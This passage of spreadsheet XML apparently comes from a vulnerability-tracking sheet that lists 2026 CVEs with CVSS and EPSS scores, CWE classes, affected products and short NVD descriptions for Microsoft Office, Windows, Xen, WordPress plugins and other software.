          <t>CWE-416</t>
        </is>
      </c>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78525</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78526</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr"/>
      <c r="Q375" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78526</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78834</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr"/>
      <c r="Q376" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>A code execution vulnerability exists in CMSimple 5.22 in the CoAuthors plugin. An authenticated low-privileged user who can modify page content and provide controlled imported content can trigger server-side execution by referencing crafted external or uploaded text content through the affected content import feature.</t>
        </is>
      </c>
      <c r="S376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78834</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79376</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr"/>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr"/>
      <c r="Q377" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-20</t>
        </is>
      </c>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>An issue in the l2cap_handle_data() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="S377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79376</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79602</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr"/>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr"/>
      <c r="Q378" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>A guest with a PCI device assigned that has at least a BAR on the IO port
space can trigger a BUG() in Xen.</t>
        </is>
      </c>
      <c r="S378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79602</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79674</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr"/>
      <c r="L379" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M379" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr"/>
      <c r="P379" s="5" t="inlineStr"/>
      <c r="Q379" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79674</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79744</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr"/>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr"/>
      <c r="Q380" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862</t>
        </is>
      </c>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.29, MCPHub's PUT /api/system-config endpoint (handler updateSystemConfig) performs no authorization check. It is protected only by the app-wide authentication middleware and a rate limiter — it never inspects req.user.isAdmin. This issue has been patched in version 1.0.29.</t>
        </is>
      </c>
      <c r="S380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79744</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80074</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr"/>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr"/>
      <c r="Q381" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80074</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80077</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr"/>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr"/>
      <c r="Q382" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80077</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80080</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F383" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I383" s="5" t="inlineStr"/>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L383" s="5" t="inlineStr"/>
      <c r="M383" s="5" t="inlineStr"/>
      <c r="N383" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O383" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P383" s="5" t="inlineStr"/>
      <c r="Q383" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R383" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80080</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80081</t>
        </is>
      </c>
      <c r="D384" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E384" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F384" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G384" s="5" t="inlineStr"/>
      <c r="H384" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I384" s="5" t="inlineStr"/>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps</t>
        </is>
      </c>
      <c r="L384" s="5" t="inlineStr"/>
      <c r="M384" s="5" t="inlineStr"/>
      <c r="N384" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P384" s="5" t="inlineStr"/>
      <c r="Q384" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R384" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80081</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80083</t>
        </is>
      </c>
      <c r="D385" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E385" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F385" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G385" s="5" t="inlineStr"/>
      <c r="H385" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I385" s="5" t="inlineStr"/>
      <c r="J385" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K385" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L385" s="5" t="inlineStr"/>
      <c r="M385" s="5" t="inlineStr"/>
      <c r="N385" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O385" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P385" s="5" t="inlineStr"/>
      <c r="Q385" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="R385" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80085</t>
        </is>
      </c>
      <c r="D386" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E386" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F386" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G386" s="5" t="inlineStr"/>
      <c r="H386" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I386" s="5" t="inlineStr"/>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L386" s="5" t="inlineStr"/>
      <c r="M386" s="5" t="inlineStr"/>
      <c r="N386" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O386" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P386" s="5" t="inlineStr"/>
      <c r="Q386" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R386" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80085</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B387" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80096</t>
        </is>
      </c>
      <c r="D387" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E387" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F387" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G387" s="5" t="inlineStr"/>
      <c r="H387" s="5" t="n">
        <v>0.007</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c r="Q387" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R387" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t>
        </is>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B388" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80465</t>
        </is>
      </c>
      <c r="D388" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E388" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F388" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G388" s="5" t="inlineStr"/>
      <c r="H388" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I388" s="5" t="inlineStr"/>
      <c r="J388" s="5" t="inlineStr"/>
      <c r="K388" s="5" t="inlineStr"/>
      <c r="L388" s="5" t="inlineStr"/>
      <c r="M388" s="5" t="inlineStr"/>
      <c r="N388" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O388" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P388" s="5" t="inlineStr"/>
      <c r="Q388" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R388" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Mendix SAML (Mendix 10 compatible) (All versions &lt; V4.2.3), Mendix SAML (Mendix 11 compatible) (All versions &lt; V4.2.3), Mendix SAML (Mendix 9.24 compatible) (All versions &lt; V3.6.27). Affected versions of the module do not properly validate the SAML response signature. This could allow unauthenticated remote attackers to hijack an account (session) in specific SSO configurations.</t>
        </is>
      </c>
      <c r="S388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80465</t>
        </is>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B389" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81352</t>
        </is>
      </c>
      <c r="D389" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr"/>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr"/>
      <c r="Q389" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81352</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81385</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t>
        </is>
      </c>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr"/>
      <c r="Q390" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81385</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81543</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr"/>
      <c r="Q391" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>The Abandoned Cart Pro for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 10.7.1. This is due to missing capability checks and nonce verification on multiple AJAX actions including wcap_save_connector_settings, wcap_send_manual_email, wcap_abandoned_cart_info, and wcap_change_manual_email_data. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify SMTP connector settings to route administrator recovery emails through an attacker-controlled server and intercept auto-login links to gain full administrative access. The plugin's auto-login feature must be enabled, which is the default configuration.</t>
        </is>
      </c>
      <c r="S391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81543</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81952</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr">
        <is>
